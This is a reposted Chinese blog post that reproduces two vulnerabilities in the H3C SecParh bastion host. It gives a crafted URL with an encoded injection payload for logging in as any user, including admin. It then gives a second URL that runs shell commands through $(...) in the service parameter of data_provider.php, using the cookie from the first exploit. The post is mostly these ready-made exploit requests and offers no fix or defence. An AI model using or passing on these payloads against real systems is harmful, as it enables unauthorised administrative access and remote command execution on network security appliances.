0


H3C SecParh堡垒机任意用户登录与远程执行代码漏洞

H3C SecParh堡垒机任意用户登录与远程执行代码漏洞

1.H3C SecParh堡垒机任意用户登录漏洞

1.1.漏洞描述

  在H3C SecParh堡垒机 get_detail_view.php 存在任意用户登录漏洞。

1.2.漏洞影响

  H3C SecParh堡垒机

1.3.漏洞复现

1.3.1.登录页面

  该漏洞版本的登录页面如下,2018年的。
在这里插入图片描述

1.3.2.构建URL

URL:https://IP地址:端口//audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=admin

在这里插入图片描述

1.4.总结

  这里确实成功登录上去了,若设定三权的话,可能存在把admin用户设定为类似与这里的审计管理员,那么就需要测试是否能够跳转到操作管理员或者其它的一些管理员账号上去。这里就不再深入测试,只是提供一个思路。

2.H3C SecParh堡垒机远程命令执行漏洞

2.1.漏洞描述

  H3C SecParh堡垒机data_provider.php存在远程命令执行漏洞,攻击者通过任意用户登录或者账号密码进入后台就可以构造特殊的请求执行命令。

2.2.漏洞影响

  H3C SecParh堡垒机

2.3.漏洞复现

2.3.1.登录页面

  该漏洞版本的登录页面如下,2018年的。
在这里插入图片描述

2.3.2.构建URL

URL:https://IP地址:端口/audit/data_provider.php?ds_y=2019&ds_m=04&ds_d=02&ds_hour=09&ds_min40&server_cond=&service=$(pwd)&identity_cond=&query_type=all&format=json&browse=true

  需要注意一定要通过先通过任意用户登录获取Cookie,然后在URL中service后面的括号中输入想要执行的命令,即可实现远程命令执行。
在这里插入图片描述

2.4.总结

  我使用火狐浏览器,我访问后就自动将信息进行下载,不过也有浏览器直接跳转界面的也行,都能够看到。

标签: php 安全 web安全

本文转载自: https://blog.csdn.net/weixin_44268918/article/details/128848888
版权归原作者 剁椒鱼头没剁椒 所有, 如有侵权,请联系我们删除。

“H3C SecParh堡垒机任意用户登录与远程执行代码漏洞”的评论:

还没有评论